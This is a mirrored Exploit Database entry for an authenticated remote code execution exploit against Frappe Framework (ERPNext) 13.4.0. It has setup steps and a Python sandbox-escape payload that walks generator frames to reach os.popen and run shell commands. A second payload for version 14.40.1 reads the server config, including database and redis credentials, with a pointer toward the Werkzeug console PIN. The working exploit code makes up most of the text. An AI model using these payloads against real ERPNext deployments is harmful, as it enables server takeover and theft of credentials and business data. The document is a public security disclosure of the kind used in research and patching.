Frappe Framework (ERPNext) 13.4.0 – Remote Code Execution (Authenticated)

• Exploit Database
• 157 阅读

• 作者： Sander Ferdinand
  日期： 2023-07-11
• 类别：

  • webapps
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/51580/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

  # Exploit Title: Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) # Exploit Author: Sander Ferdinand # Date: 2023-06-07 # Version: 13.4.0 # Vendor Homepage: http://erpnext.org # Software Link: https://github.com/frappe/frappe/ # Tested on: Ubuntu 22.04 # CVE : none   Silly sandbox escape.   > Frappe Framework uses the RestrictedPython library to restrict access to methods available for server scripts.   Requirements: - &apos;System Manager&apos; role (which is not necessarily the admin) - Server config <code>server_script_enabled</code> set to <code>true</code> (likely)   Create a new script over at <code>/app/server-script</code>, set type to API, method to &apos;lol&apos; and visit <code>/api/method/lol</code> to execute payload. </code><code>python3 hax = "echo pwned > /tmp/pwned" g=({k:v(&apos;os&apos;).popen(hax).read() for k,v in g.gi_frame.f_back.f_back.f_back.f_back.f_builtins.items() if &apos;import&apos; in k}for x in(0,)) for x in g:0 </code><code> Context: - https://ur4ndom.dev/posts/2023-07-02-uiuctf-rattler-read/ - https://gist.github.com/lebr0nli/c2fc617390451f0e5a4c31c87d8720b6 - https://frappeframework.com/docs/v13/user/en/desk/scripting/server-script - https://github.com/frappe/frappe/blob/v13.4.0/frappe/utils/safe_exec.py#L42   Bonus:   More recent versions (14.40.1 as of writing) block <code>gi_frame</code> but there is still a read primitive to escape the sandbox via <code>format_map</code>: </code><code>python3 hax = """ {g.gi_frame.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_globals[frappe].local.conf} """.strip()   g=(frappe.msgprint(hax.format_map({&apos;g&apos;: g}))for x in(0,)) for x in g:0 </code><code> Which prints the Frappe config like database/redis credentials, etc.   In the unlikely case that Werkzeug is running with <code>use_evalex</code>, you may use the above method to retreive the werkzeug secret PIN, then browse to <code>/console</code> (or raise an exception) for RCE.